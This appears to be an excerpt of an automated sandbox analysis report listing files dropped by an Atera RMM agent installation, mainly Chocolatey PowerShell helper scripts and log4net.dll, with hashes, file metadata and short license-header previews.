                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyZipPackage {..<#...SYNOPSIS..Downloads file from a url and unzips it on your machine. Use..Get-ChocolateyUnzip when local or embedded file......DESCRIPTION..This wi

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-Vsix.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2178
                                                                                                                                                                                                                                        Entropy (8bit):5.225120339484231
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyL+4pe90AlH31KoM4eAjm3LeoXPNpxdeVP3YJxxKW2W2VlWp:cSyL+4pGXHFKoZjmnP3OVPUxxO3le
                                                                                                                                                                                                                                        MD5:5082284C6F295B50B7C28303E52D2770
                                                                                                                                                                                                                                        SHA1:08D320C56CA725CFC8D558E5C923836EDC369DFD
                                                                                                                                                                                                                                        SHA-256:D488957D7BEFF9256A176E7EA1F6D167604C175B44746B2B86B7EA0480F8089C
                                                                                                                                                                                                                                        SHA-512:F8AB98CD8A14ADFA9FED578867A6188F6CBCA5E4361FC0D17D5BAA49818DF7A24BE94C616A8FE6821B75FDCE853D426464BA8E6CE8824E2A47912F26204A8241
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-Vsix {..<#...SYNOPSIS..DO NOT USE. Not part of the public API......DESCRIPTION..Installs a VSIX package into a particular version of Visual Studio......NOTES..This is not par

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Set-EnvironmentVariable.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4463
                                                                                                                                                                                                                                        Entropy (8bit):5.326623524611151
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKo9LAVZVTfGqqHQ6+MiLMK+SIgEGZkxpU3gZCjfocO:cSyL+QGXHvAVLGqqHQ6waN9A3a
                                                                                                                                                                                                                                        MD5:C5ADB094F8B04B9D9E4E7FA429D0568F
                                                                                                                                                                                                                                        SHA1:64A4EC9D365702E1D279F0958B67EDAAC1CCFF72
                                                                                                                                                                                                                                        SHA-256:A7E60AA5802ADC6E16D105C693819D7B8F5396C9B18BB32D4E55A1C6EDDEE409
                                                                                                                                                                                                                                        SHA-512:20654DDEBFB81F1AA49BBBA3CF9C8BB2A03DA48C1D14DC63F4C200F8374393430E2515D85EE39B3EC788EFD97F8D442F07D36C06595263D57D6FEACA5B9DE152
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Set-EnvironmentVariable {..<#...SYNOPSIS..**NOTE:** Administrative Access Required when `-Scope 'Machine'.`....DO NOT USE. Not part of the public API. Use..`Install-ChocolateyEnviron

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Set-PowerShellExitCode.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1711
                                                                                                                                                                                                                                        Entropy (8bit):5.130959499082034
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyX54q90AlH31KofO/OuBT0fkaCVYBt4PHU:cSyp4aXHFKozUVYBt4c
                                                                                                                                                                                                                                        MD5:73DCA113BBA352B82F814797A5E075B5
                                                                                                                                                                                                                                        SHA1:B514007F4B97D41584B73A1BFFBE24B37131CCD1
                                                                                                                                                                                                                                        SHA-256:A4F55463BF3258F02058B8A568A4F650B6DEA54BE1E5851C9339D53DBA2CC08F
                                                                                                                                                                                                                                        SHA-512:9F0D8D5B5C418BDBD9034EF8BFEBA20D4F1D99B37F4DE7867102E6486BA6F5BA7D9CB5C34E7D9649546B74E81B6E238EB8CBA8BB458C7A0AFBC975B49ED04011
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....Function Set-PowerShellExitCode {..<#...SYNOPSIS..Sets the exit code for the PowerShell scripts......DESCRIPTION..Sets the exit code as an environment variable that is checked and used..as the exit code for the package at the end of the package script......NOTES..This tells PowerShell that it should prepare to shut down....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Start-ChocolateyProcessAsAdmin.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (495), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16063
                                                                                                                                                                                                                                        Entropy (8bit):5.071535838625921
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXH8SvdSIVLWDL+G3YQwJOm1JzzN566OdHYrZxmrP17OrnwflAflNKc1+R:ctL+QGRvdSIWDznmzzvOUrIWjKEM05q
                                                                                                                                                                                                                                        MD5:C653DD51F0E2EF62BBD7F782C8DAE3AC
                                                                                                                                                                                                                                        SHA1:860325CDDF15E97C487A2351051517C89E414316
                                                                                                                                                                                                                                        SHA-256:120D4F0ECD7D4AF742CCE72D4CE86EBD960F3FC83FBB58860BECD79147830585
                                                                                                                                                                                                                                        SHA-512:417FD7B7609E7F002F8915D0E8EDA8EB3932FE3F4F7D88070457D2B08251CF0063C3B283C2129A02BAD6361812A16CDD1F3DFB26F55043181F9680D8B073B32E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Start-ChocolateyProcessAsAdmin {..<#...SYNOPSIS..**NOTE:** Administrative Access Required.....Runs a process with administrative privileges. If `-ExeToRun` is not..specified, it is r

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Test-ProcessAdminRights.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1913
                                                                                                                                                                                                                                        Entropy (8bit):5.085202352125102
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyL+4pe90AlH31KoMwr86KhPWBT2TiCWezzwYYm6tFnzXHtQ:cSyL+4pGXHFKo2PD2CWbm6nnzXq
                                                                                                                                                                                                                                        MD5:12DE733D7CE18AF405D81469211573D3
                                                                                                                                                                                                                                        SHA1:89C23822D6717F00281EC45FB24F420678B9901B
                                                                                                                                                                                                                                        SHA-256:F07208BE10E70B4774168EC7C0CC86FC594F1D37D991E766EC46EE335302B083
                                                                                                                                                                                                                                        SHA-512:38775567CC21292C3E06E6F7A44BC7A3C525CC2A49A95E114CFB0C4BFF2AF7EDAEFB4D09A3FD777482BCB0088507323B5618128B96A4716BE9655010A390453F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Test-ProcessAdminRights {..<#...SYNOPSIS..Tests whether the current process is running with administrative rights......DESCRIPTION..This function checks whether the current process h

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\UnInstall-ChocolateyZipPackage.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2897
                                                                                                                                                                                                                                        Entropy (8bit):5.162176606162476
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyL+4pe90AlH31KoMjgAOTJEd4phQ44Yb1eVGXsjlKo9obKB9x/kgeoS5:cSyL+4pGXHFKod+aSZVLjo7m1Ju5
                                                                                                                                                                                                                                        MD5:B0DDD1F261098CAF4092E78539A61796
                                                                                                                                                                                                                                        SHA1:6F753444CE488773EC7AD4942BFB79BF79BC2A65
                                                                                                                                                                                                                                        SHA-256:12E80EA9AA3D894DB1BB1999DD766EF4925ECD59FEC8DEDCABF241DE96E1A949
                                                                                                                                                                                                                                        SHA-512:5C624D18321916C905287595ECC72CF996F24F27E68E22F35C1D07AD7004F579EE64D3E0AE5AE6867DE13A02E61F9893D3DB848A82D41FEC309C77DD88752F75
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Uninstall-ChocolateyZipPackage {..<#...SYNOPSIS..Uninstalls a previous installed zip package, may not be necessary......DESCRIPTION..This will uninstall a zip file if installed via I

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Uninstall-BinFile.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3683
                                                                                                                                                                                                                                        Entropy (8bit):5.175198661740516
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKo2fFecAVuAlxoVGv5nPcdTmqKYDqnShM:cSyL+QGXHc0nVuAlOVGvpPcdTmx
                                                                                                                                                                                                                                        MD5:FCD698961855179908D84E45C1699CD3
                                                                                                                                                                                                                                        SHA1:449CF377EA5EEFC250DF24DC64F36F374C3EA022
                                                                                                                                                                                                                                        SHA-256:093191162E950B4CFDCDD066865C74E47F3F05B3543A9A98A7B82AD98C8236CA
                                                                                                                                                                                                                                        SHA-512:96C0B5867C19A9F06C81F507102FDBCC270BEBAB132E8A3EDE88CED129E369D282AC5F874B0F0AB94214C41C857EF74735909045AA3FDACFF96C74A38FA7AFB6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Uninstall-BinFile {..<#...SYNOPSIS..Removes a shim (or batch redirect) for a file......DESCRIPTION..Chocolatey installs have the folder `$($env:ChocolateyInstall)\bin`..included in t

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Uninstall-ChocolateyEnvironmentVariable.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3131
                                                                                                                                                                                                                                        Entropy (8bit):5.1027007896112115
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyX54q90AlH31KoMSta1Qr44qR4MXbVqlzmwETvp6SCodQsV:cSyp4aXHFKovRVKVwETB6SCu
                                                                                                                                                                                                                                        MD5:256F7D3F77746A9167E513497A1DEF85
                                                                                                                                                                                                                                        SHA1:0F213C21586F176C405C1877C6E7D2FD5B8E85AC
                                                                                                                                                                                                                                        SHA-256:4CE0A48B7A6D6FE997324F7F916DEA532754E4C371CEE38CACE5134EA1D3A101
                                                                                                                                                                                                                                        SHA-512:763263F5E68A1CB7391394570A7CCDDAF518A1522E3F0435EA62848631A03CF278E15F6375F02C0466CBEEBB4365BA419ADB3AB6549BA3BCB09C9BB718825F03
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Uninstall-ChocolateyEnvironmentVariable {..<#...SYNOPSIS..**NOTE:** Administrative Access Required when `-VariableType 'Machine'.`....Removes a persistent environment variable......DESCRIPTION..Uninstall-ChocolateyEnvironmentVariable removes an environment variable..with the specified name and value. The variable c

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Uninstall-ChocolateyPackage.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6062
                                                                                                                                                                                                                                        Entropy (8bit):5.047713257621158
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKoQ79vUU2ZTooaYjuVSQPsVeqYQfiyLi9xSQeSDHyXfOWQfpQf6:cSyL+QGXHweZdlFV8bQ7ov
                                                                                                                                                                                                                                        MD5:39599553B392FDEA36398A474FD623F2
                                                                                                                                                                                                                                        SHA1:89587AEDEC8ECADD274EE80EE43101032A55BAD4
                                                                                                                                                                                                                                        SHA-256:716E51F45EA009C6AEC10F123C58A837516E59910CD0DFB274DF0FF6A56EBF08
                                                                                                                                                                                                                                        SHA-512:1BA55A2CEC0EA911B3418FA8B1979EE8EF45C16033C82F1794416CA85D8F7D9B2618855008F8014BD1FA2A8466ECEB9E36A41E985122F8D04C765051C6DAF5C0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Uninstall-ChocolateyPackage {..<#...SYNOPSIS..Uninstalls software from "Programs and Features"......DESCRIPTION..This will uninstall software from your machine (in Programs and..Feat

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Update-SessionEnvironment.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3611
                                                                                                                                                                                                                                        Entropy (8bit):5.0574071891740795
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKosxHb1u5jen+UMGeKJ1qeg:cSyL+QGXHWp+i5MzK/g
                                                                                                                                                                                                                                        MD5:AB7F32D92867D5CC52CB177374C656C2
                                                                                                                                                                                                                                        SHA1:ACB20AAADD71C921899DE91640DA2AB5F78984CA
                                                                                                                                                                                                                                        SHA-256:A1AD9ED3C049CA14C7970AA17CF5C6A28448E70FF2BE4E438A61C6DAB68E82B7
                                                                                                                                                                                                                                        SHA-512:22295E4C289EC0057B3F13A3B9C18B9B02CC4379D8E1F4F6FEBE48A45A05D92A5384EC158E4370CB5E67F33751377C2CD81C4F8E555145C49BF7680FE545F905
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Update-SessionEnvironment {..<#...SYNOPSIS..Updates the environment variables of the current powershell session with..any environment variable changes that may have occured during a.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Write-FunctionCallLogMessage.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1974
                                                                                                                                                                                                                                        Entropy (8bit):5.219633769893594
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:cSyJ3554IpXAAyU0E+SlHQk1GpsLA9i9yVMppqTDf3nQytTxGEN8X/+nKB0chWqc:cSyX54q90AlH31KoMYpqfvVF2M1zrvn
                                                                                                                                                                                                                                        MD5:6A2F945A16F003443B3C14907163C357
                                                                                                                                                                                                                                        SHA1:EBDDA9AC96E6F71D0BEED493C5074F2CAFE638C2
                                                                                                                                                                                                                                        SHA-256:279171398D6F65221D4636DA730AB2F07C6DD56321BF76A03D0CA7D3D7B0B574
                                                                                                                                                                                                                                        SHA-512:C09FC9C169D5197B841EED9D44135F43AA8D11CC0463A567E922FE019545C9036542AD40AF5D64B808AF92E143787A8231CBF4F5B8A2F8F94E48614E8E06EFA0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Write-FunctionCallLogMessage {..<#...SYNOPSIS..DO NOT USE. Not part of the public API......DESCRIPTION..Writes function call as a debug message......NOTES..Available in 0.10.2+.....This function is not part of the API......INPUTS..None.....OUTPUTS..None.....PARAMETER Invocation..The invocation of the function (`$My

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lastSnapshot.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32
                                                                                                                                                                                                                                        Entropy (8bit):3.632048827786958
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:jqAdGdtGdnn:+hTGF
                                                                                                                                                                                                                                        MD5:FB26701A5D20C5077053DFE015B37875
                                                                                                                                                                                                                                        SHA1:2EA39F4E21B117BEB8517F60D304070DA3A8055D
                                                                                                                                                                                                                                        SHA-256:759B3461F7A0991CC2A036560924ADC50EA1C15C4D17F590EEBD457330157495
                                                                                                                                                                                                                                        SHA-512:42A8832B0523D8F0720BB02C91815E3DBF71EC02C935A947A465FC0E00FFBDCF511D7DFC921DE54669312AE9735B53EDF21957F55A00D60977B1A1325FE496C8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:ecc39e64c8fba863f2e647300224d62f

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\log4net.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):280616
                                                                                                                                                                                                                                        Entropy (8bit):5.690963329276027
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:UG0WgexKpGi8PnJcerXUaxX3HVeES4BEIqTTpX/4ormGpnaVTSGCkMhkEn7GAhCj:UJrycoB3HVeESME3pnaVTS1nh7hCaW
                                                                                                                                                                                                                                        MD5:44ABABBFD8B19156C37277E917803B81
                                                                                                                                                                                                                                        SHA1:4261965865038BB98C8BB30D9B065099BBCB996E
                                                                                                                                                                                                                                        SHA-256:1A3F64642AE3B69ABC2E500EB93FCC9F3350B1CE05E8F15C671BA8C60CFE797F
                                                                                                                                                                                                                                        SHA-512:D15A64BA263DA151D8E531870A0C47049E6AD805420548291DE776C160EF4D0545FD2D8B66C9AC1D2871A797BC22D9A611DB00294CD5B27D0EFCA48D8FF33678
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p3..........." ..0...... ........... ... ....... .......................`......).....`.................................h...O.... ............... ..((...@......L................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\choco.summary.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12087
                                                                                                                                                                                                                                        Entropy (8bit):5.260577567074124
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:n5Se2sJROSgNlcz/IklXtozfki5IMPrqbNz+5ncI9zA4UEL8V+PRx9JYM6:n5SYah+C/jRx90
